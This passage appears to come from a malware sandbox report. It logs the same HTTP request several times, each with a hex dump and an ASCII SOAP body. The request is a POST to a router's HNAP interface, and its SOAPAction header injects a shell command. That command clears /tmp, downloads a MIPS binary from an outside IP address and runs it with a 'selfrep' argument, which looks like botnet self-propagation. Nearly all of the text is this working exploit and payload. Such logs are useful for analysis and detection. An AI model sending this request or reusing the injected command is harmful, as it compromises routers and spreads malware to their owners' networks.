2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping 